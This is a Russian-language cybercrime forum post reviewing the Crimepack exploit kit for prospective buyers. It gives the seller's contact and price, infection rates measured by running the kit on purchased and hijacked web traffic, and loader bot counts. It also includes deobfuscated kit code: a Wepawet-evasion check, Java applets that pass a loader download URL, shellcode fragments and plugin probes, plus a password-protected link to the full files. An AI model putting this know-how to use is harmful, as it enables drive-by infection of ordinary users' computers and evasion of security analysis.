• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Crimepack Exploit System

Отслеживать
Ar3s

Ar3s

Старожил форума
Легенда
Регистрация
30.12.2004
Сообщения
3 357
Реакции
1 404
logoqt.png

Ping уважаемые мемберы!
Пришла весна, потекли лужи, а у меня появилось немного свободного времени.
Сегодня я буду вместе с GOONER-ом вещать в сеть рассказ о новой связке эксплоитов от наших заморских коллег.

---------------------------------------------------------------------------------------------------------------------------------

Итак поехали:
Официальный топик связки тут!

Основные моменты:
Globals

+ Flash10
+ Adobe Acrobat Reader (<= 9.2)
+ JRE (Many vulnerable)
+ AGGRESSIVE MODE**

Internet Explorer
+ MDAC
+ DSHOW
+ MS09-002

Exploit rates on test run (26/2/2010)

Internet Explorer 6 & 7 - 39%
Firefox - 14%
Opera - 6%
Overall Rate: 30%

Rate Countries:

US: 14%
UK: 7%
IN: 38%
DE: 16%
TR: 22%
IT: 18%
AU: 11%

Ну и как всегда смотрим цену:
$400 - 1 License
1 License includes:
+ Domain locked one domain (subdomains unlimited)
+ 2 new domain builds if blacklisted
+ Support
+ Minor updates for free
+ Discount on new releases

---------------------------------------------------------------------------------------------------------------------------------
Связываюсь с автором icq 631592697
Общаемся на моем ломаном английском... Автор, кстати, из Скандинавии.
Получаю пак в руки. Смотрю... (!!!Рис.1)
Размер файлов 722 Кб.
Плюс отдельно мне давали базу geoip в виде sql. Она 5,5 метра еще завесила. (к сожалению ее мне дали уже после тестов. Это была первая недоработка. На ее исправление автору потребовалась неделя... Что меня несколько смутило.)
Все файлы под ионом.

Требования под связку довольно стандартные:
Linux, PHP5, MySQL, libcurl, ioncube

Беру хост, устанавливаю. (!!!Рис.2)

-------==Тест №1==------
Первый тест проводим на трафе автора. Для подведения статистики отстука использовался MyLoader.
Скрин лоадера до прогруза (!!!Рис.3)
Скрин связки по трафу и сплоитам (!!!Рис.4)
Скрин связки по рефам (!!!Рис.5)
Скрин связки по Странам (!!!Рис.6) (Как я и говорил предварительно - у меня тут были глюки в самой связке. И GeoIP тупо не отрабатывал.)
Скрин связки по настройкам (!!!Рис.7)
Скрин связки по проверке домена на блэк-листы (!!!Рис.8) (К сожалению эта функция у меня не работала. Причину нас с автором выяснить не удалось. Пускать его на мой хост не хотелось, а ему разбираться в моих глюках было лениво. Это недоработка номер два.)

Что хочу дополнительно сообщить. Меня смутило два момента.
1. Идет траф - загрузок нету. Затем резкий скачек и вдруг пробив 34%.
2. Траф считается как-то десятками. 31-41-51-61. т.е. обновляю стату - 31, еще раз обновляю - 41. и т.д. Потом начал тупо рефрешить нон-стоп. Поймал значение 63. Чушь какая-то.

А теперь малость статистики:
Автор слил 1226 хитов. Пробив по ним был суммарный 23%.
Из них: IE - 29%, FF - 10%, Opera - 8%
Итого 287 лоадов было сделано.
Смотрим на лоадер и видим, что остучалось 193 бота, что составляет 67,2%.

Скрин общий. (!!!Рис.9)
Скрин по билдам. (Грузил со связки билд *****508) (!!!Рис.10)
Скрин по странам (!!!Рис.11)

Автор меня малость поразил. Или он рассчитывал что тут все лохи, или что не заметят, но сливал траф с большим перевесом IE. (IE - 855, FF - 332, Opera - 39 хитов, естественно mdac в списке победителей....)
Это конечно же благоприятно отразилось на финальном показателе пробива. Но мы же не олени и прекрасно представляем что получится на "боевом" трафе...

-------==Тест №2==------
Траф беру у знакомого сэллера.

Скрин MyLoader до прогруза (!!!Рис.12)
Скрин связки в работе (!!!Рис.13)
Скрин связки по рефам (!!!Рис.14)
Скрин MyLoader после прогруза (!!!Рис.15)

Ar3s - что это за траф?
seller - вплане?
Ar3s - источник?
seller - фтп, шеллы
Ar3s - очень большая разбежка получается с другим трафом. Там пробив 24% был. Тут 8%...
seller - с каким другим ?
Ar3s - я брал для этого теста еще один траф.
seller - ммм .. хз .. у меня 12% норм пробив

Статистика связки такова:
Слито 2483, пробито 208, пробив 8%.
Траф в этом тесте шел вполне обычный, IE 619, FF 1165, Opera 699. Соответственно здесь нужно было поработать сплоитам под FF, что собственно и видим. В статистике рулит Java-сплоит.

Статистика по лоадеру: 208 отгружено, 108 отстучалось, процент отстука 51,9%.

-------==Тест №3==------
Беру траф у знакомого. Он на биржах любитель тариться. Гоним, смотрим.

Скрин MyLoader до прогруза (!!!Рис.16)
Скрин связки в работе (!!!Рис.17)
Скрин связки по рефам. (!!!Рис.18)
Скрин MyLoader после прогруза (!!!Рис.19)

Статистика связки такова: 1061 - отгружено, 82 - пробито, это составляет 8%.
Траф шел IE 200, FF 459, Opera 402. (Java опять в лидерстве)

Статистика по лоадеру: 82 отгружено, 27 отстучалось, что составляет 32,9%.

Из-за неработающего GeoIP страны трафика в тестах отследить не удалось. Но по заверениям сэллеров - это был микс европа.
 
Переходя к рассмотрению "внутрянки" хочу выразить благодарность GOONER-у, который собственно этой частью и занимался.

Итак в арсенале:
+ Flash10
+ Adobe Acrobat Reader (<= 9.2)
+ JRE (Many vulnerable)
+ MDAC
+ DSHOW
+ MS09-002

...........................................................
1.В малзилле вбиваем в поле URL site_to_test.com/crime/ жмем GET
получаем
<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=get.php?eid=U28Dfz3FF3ufWXToE">

!!!Рис.2_1

2.В поле URL вбиваем site_to_test.com/crime/get.php?eid=U28Dfz3FF3ufWXToE
Получаем:
Код: 
<html><head>
  <div id="esUhubu">eVhFbXVKRURlU0VydVZ1cFlodWhBUVlUZXRlWFVneXBl
!!!!Порезано для экономии места.
var bUhFlPjTpM = nPvLovYfXr.location.href;
var sIbxTQtswR = bUhFlPjTpM.search(lXeNLanPfc);
if(sIbxTQtswR != -1){
return 0;
}else{
return 1;
}
}
!!!!Порезано для экономии места.
nPvLovYfXr.write(hsoKmPIQCj);
var nLFrBmsocit = "csmjhpxxHIA";
var iRzouWlmJUUyS = "qSqmtDlSHLyye";
}</script></html>

!!!Рис.2_2


3.///////////////////////О детекте Wepawet'a//////////////////////////////////////

сразу видим функцию которая отвечает за детект Wepawet'a

Код: 
   function jEjRhdhacj()
 {
   var zHaPBvL = "aoMzFzb";
   var lXeNLanPfc = "jsAvHlwxJNcjsAvHlwxJNsjsAvHlwxJN.jsAvHlwxJNujsA
!!!!Порезано для экономии места.
   var bUhFlPjTpM = nPvLovYfXr.location.href;
   var sIbxTQtswR = bUhFlPjTpM.search(lXeNLanPfc);
   if(sIbxTQtswR != -1)
   {
     return 0;
   }
   else
   {
     return 1;
   }
 }
 
 Ну и условие if(jEjRhdhacj()){....}
 
 Смотрим на код replace(/jsAvHlwxJN/g,"") ага убираем jsAvHlwxJN
 перед этим в коде видим var nPvLovYfXr = document;
 итого расшифрованный участок кода
    function jEjRhdhacj()
 {
   var zHaPBvL = "aoMzFzb";
   var lXeNLanPfc = "cs.ucsb.edu";
   var vOEBIBdyXIRRylVkMzhH = "ghdgFtroVgeCxFtzZRtU";
   var bUhFlPjTpM = document.location.href;
   var sIbxTQtswR = document.search(lXeNLanPfc);
   if(sIbxTQtswR != -1)
   {
     return 0;
   }
   else
   {
     return 1;
   }
 }


4.Приведем полученный результат (index.txt) в нормальний (пригодный для малзиллы)вид
-меняем <div id="esUhubu">бла-бла-бла<div> на var esUhubu="бла-бла-бла"; и так же само с остальными.....
-убираем всякие штуки типа <script> <html> <head> итд
-смотрим var umnowZEEpG = O4qFCebwwFqueK8(nPvLovYfXr.getElementById("pnQFVXsmrj").innerHTML); и меняем на
var umnowZEEpG = O4qFCebwwFqueK8(pnQFVXsmrj); и так же само с остальными.....
-убираем if(jEjRhdhacj()){}

5.В результате получаем такое:
Код: 
 var esUhubu = "eVhFbXVKRURlU0VydVZ1cFlodWhBUVlUZXRlWFVneXBld
!!!!Порезано для экономии места.
nPvLovYfXr.write(hsoKmPIQCj);
var nLFrBmsocit = "csmjhpxxHIA";
var iRzouWlmJUUyS = "qSqmtDlSHLyye";


6.Дальше в малзиллу на вкладку Decoder жмем Run script и получаем расшифрованный код (index_decoded.txt)

!!!Рис.2_3

Смотрим дальше видим java сплоит

Код: 
 document.write("<body><div id=\"YRysaTUqyrenuqu\"></div></body>");function UZUVUMeguTEqyta(){
	if (navigator.javaEnabled()) {
	var pnkiEVdcKwugCwMDydqBVoWfJC = '<applet code="iii.qqq.sexxxy.class" archive="java.php?eid=
!!!!Порезано для экономии места.
	var eReOVQCFyHbcjlYdSaaeeYHVZd = document.createElement("div");
	eReOVQCFyHbcjlYdSaaeeYHVZd.innerHTML = pnkiEVdcKwugCwMDydqBVoWfJC;
	document.body.appendChild(eReOVQCFyHbcjlYdSaaeeYHVZd);
	}
ссылка на сам архив archive="java.php?eid=F181936B5E02D7F484C2D623E5E36A4E&type=1&key=UtEsAREvEPYraSUWABeG"
тоесть скачать эго мы можем отсюда http://site_to_test.com/crime/load.php?spl...OXt60&y=3543809
Качаем.........
ссилка на лоадер:

http://site_to_test.com/crime/load.php?spl...OXt60&y=3543809

скан https://avcheck.ru/

!!!Рис.2_4

7.С помощью Java Decompiler открываем aZYnugEVuB.jar и смотрим на код .....
Из кода видно
Код: 
pnkiEVdcKwugCwMDydqBVoWfJC += '<param name="crimepack" value="http://site_to_test.com/crime/load.php?spl=java&b=op&o=xp&i=jn5FDi8rZBrWOXt60&y=3543809">';
	pnkiEVdcKwugCwMDydqBVoWfJC += '<param name="count" value="1"></applet>';

параметр count отвечяет за число скачаных файлов
crimepack - ссылка на лоадер

!!!Рис.2_5
!!!Рис.2_6
!!!Рис.2_7

следующий JAVA сплойт YGEsERapYL.jar
Код: 
var rCvQbsxcAfTZOmS = '<applet code="crimepack" archive="java.php?eid=F181936B5E02D7F484C2D623E5E
36A4E&type=2&key=aqYsuzEVudusUpAqUXud" width="300" height="300">';


!!!Рис.2_8

в параметре sc -шеллкод в малзиллу на вкладку Misc Decoders => Hex => ПКМ Paste as HEX

!!!Рис.2_9

8.Далее качаем ПДФ
Код: 
oFoIeinTEJetuVCdgOtujG.setAttribute('src', './pdf.php?pdf=F181936B5E02D7F484C2D623E5E36A4E');

Хотелось бы отметить что функция обфускации некоторых элементов в пдф, была взята с метасплоита..
(обфускации подлежат строки ,которые начинаються с /, например /Type /Size /Filter /Length ...)
Суть в том, что символ можна представить его шеснадцатеричным значением ANSI кода(#XX).В итоге выходит что-то на подобии <</#50#61rent...

9.Идем дальше
Код: 
var cTdreRTNRGG = navigator.plugins["vnnbNhnzKfnShvnnbNhnzKfnovnnbNhnzKf
nckvnnbNhnzKfnwavnnbNhnzKfnve FvnnbNhnzKfnlvnnbNhnzKfnasvnnbNhnzKfnh".replace(/vnnbNhnzKfn/g,"")];

расшифровуем и видим проверку плагинов
Код: 
var cTdreRTNRGG = navigator.plugins["Shockwave Flash".replace(//g,"")];
	
	var ucFqmcyShzj = "vnnbNhnzKfnsvnnbNhnzKfnwvnnbNhnzKfnfvnnbNhnzKfn.vnnbNhnzKfnpvnnbNhnzKfnh
!!!!Порезано для экономии места.
eL".replace(/vnnbNhnzKfn/g,"");
расшифровуем и видим ссылку на swf сплоит,качаем его....
Код: 
var ucFqmcyShzj = "swf.php?eid=F181936B5E02D7F484C2D623E5E36A4E&type=1&key=AZuWySYNeqEnUDYPeQeL".replace(//g,"");

далее его шеллкод

Код: 
var dRHIVRXdBGM = unescape("%u56e8%u0000%u5300%u56
!!!!Порезано для экономии места.
2%u584f%u3674%u0030");

Шелл в малзиллу и видим ссылку на загрузку....

!!!Рис.2_10

10. Дальше видим Java апплет который присутствует при включенном AGRESSIVE MODE java.php?eid=F181936B5E02D7F484C2D623E5E36A4E&type=3&key=aHEjuTyDEGeRYzYvANaB

Качаем и смотрим

!!!Рис.2_11

11. Исследуем под другими user-agent'ами аналогично..........


Добавлено в [time]1268740789[/time]
---------------------------------------------------------------------------------------------------------------------------------
Итак, в нарушение своих традиций, мне захотелось сделать выводы и написать отзыв.
1. Внешне связка эффектная. Но я не баба, чтобы за рюшечьками гнаться. Да и детские понты у меня давно закончились. Для начала бросскую форму авторизации рекомендую заменить на неопознаваемую!
2. Порадовало, что при смене узер-агент на linux мне не выдало сплоиты. Но в тоже время при представлении яндекс-ботом - получил java-сплоит в браузер.
3. Недостаточная информативность админки. Сколько раз прошу связкописателей! НУ НАУЧИТЕСЬ вы определять тупых ботов в трафике. А в админке заведите графу "трафик с выключенным JS". Кроме того админка ограничивается в статистике только продуктами майкрософта. Не хочется лишний раз рекламировать элеонору, но она клево показывает браузеры. Четко видно кто меня посещал. Кроме того - замечательный финт был показан в Фрагусе. Под каждого сэллера трафа можно грузить свой файл. Можно и дальше развивать тему. Файл под страну и т.д. Здесь же задавать сэллеров вообще не представляется возможным.
4. Пробив на "боевом" трафе меня абсолютно не порадовал. 8% это не то, к чему хочется стремиться.
5. Менять русского брата на скандинавского "мастера" я бы не стал. Проблемы с взаимопониманием у меня вылезли налицо. Кроме того, достать абузой ближнего своего гораздо проще чем Дядю ХЗ как зовут из далекой страны оленей.
6. Налицо некоторая недоработанность связки. Для применения на серьезном трафике она требует доработки. Тот же геоип вспомним...
7. Использование иона дает дополнительную нагрузку на серв. Если будете гнать =>150-200К трафа в сутки - нужно брать хост по мощнее.
8. Радует цена. 400$ - вполне приемлимо для связки.

---------------------------------------------------------------------------------------------------------------------------------
Благодарности!
GOONER - за соавторство и проделанную работу. (не забудьте отблагодарить человека плюсанув в репу.)
my-loader - за предоставление лоадера для обзора. Офф. топик о продаже Тут!
Всем тем, кто меня не забывал. Писал мне в асю и рассказывал что-то новое.

Записки на полях, специально для xss.pro/

p.s. Ссылка на Альбом №1 со скринами. Ссылка на Альбом №2.
Ссылка на полную версию реверса и на файлы полученные в части исследования. Скачать!
пароль: GlhsfHfksdhwnksdf
Ссылка на скрин с исправленным GeoIP
 
Дорогой друг, Хороший обзор, но хотелось бы увидеть в след. статьях обзор связок по категории цена/качество
 
Дорогой Schtirliz!
Я предлагал уже такой обзор. Вот здесь.

А чтобы не утруждать никого длительным чтением - сообщу, что связок для сравнения было всего две. И сравнивать их смысла небыло. Многие авторы просто проигнорировали мое предложение.

А тот же автор либерти тянет с обзором уже несколько месяцев. (хотя изначально я получил связку для обзора, и даже сделал тесты на трафике, но тогда пропал из-за проблем в реалке DeusTirael и все сроки вышли. К моменту его появления связка уже палилась всем чем можно. А новый билд я долгое время уже получить не могу... Обещают "завтра" каждый раз...)

Yes - никому не надо напоминать на какой ноте мы с рутом расстались?
Fragus - проигнорировал.
Eleonora - полное согласие
Crime - я только что описал. Да и автор я думаю согласится. Он человек вроде простой в этом плане.
Phoenix - ему не предлагал. Он, судя по моей с ним последней беседе, очень высокого полета. Уж не за рутом ли следом собрался?
Связка от нуклеона - хз. Можно попробовать.
Венни вроде тоже что-то продавал свое, но под большим вопросом это все.

Понимаете, на словах все горазды. А сравнить - боятся...
 
Yes - никому не надо напоминать на какой ноте мы с руфом расстались?

Тоже не хочется рекламировать, но именно YES были первыми(из свободно продающихся связок), кто ввёл статистику и блокирование ботов, выдачу эксплоитов только под Windows, возможность загружать разные файлы(ещё до Fragus), в том числе и по странам, броузерам, операционным системам, как Вы писали в выводах. Жаль, что Вы так и не закончили обзор, особенно, если бы по новой версии.

Интересно, почему Webzilla Fragus не согласился на обзор. Его продукт был неплохого уровня.

Вы с Liberty давно общались? На сколько знаю, их продукт практически умер. Ещё остался Nuclear, на сколько мне известно, обзор Вы не проводили, но автор достаточно дружелюбный человек и вряд ли отказал бы Вам. Тем более, что он дольше всех на рынке.
 
Товарищ Ar3s +1
Хотелось бы увидеть в обзорах побольше софта, имею в виду не только связок...
 
Скрытый текст требует сообщений 150

Не в обиду, но дорасти нужно. Халявщиков очень много, а мне нужно поднимать форум/посещаемость и главное!!! - наполнение. Подними интересую тему и 150 постов наберешь очень быстро.
 
Этот скрин уперт у нас. Посмотрите на каменты gooner-a, которые не вырезали из скрина...

Написал коммент на тему, а где копирайты? Вы слизали скрин и идею. Камент провисел 15 Минут. Затем был удален.
 
Забавно malwareint о crimepack'e написали....(обратите внимание на зелёный скрин)
написал им коммент по поводу линка на первоисточник, но видимо он модерацию не пережил :)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх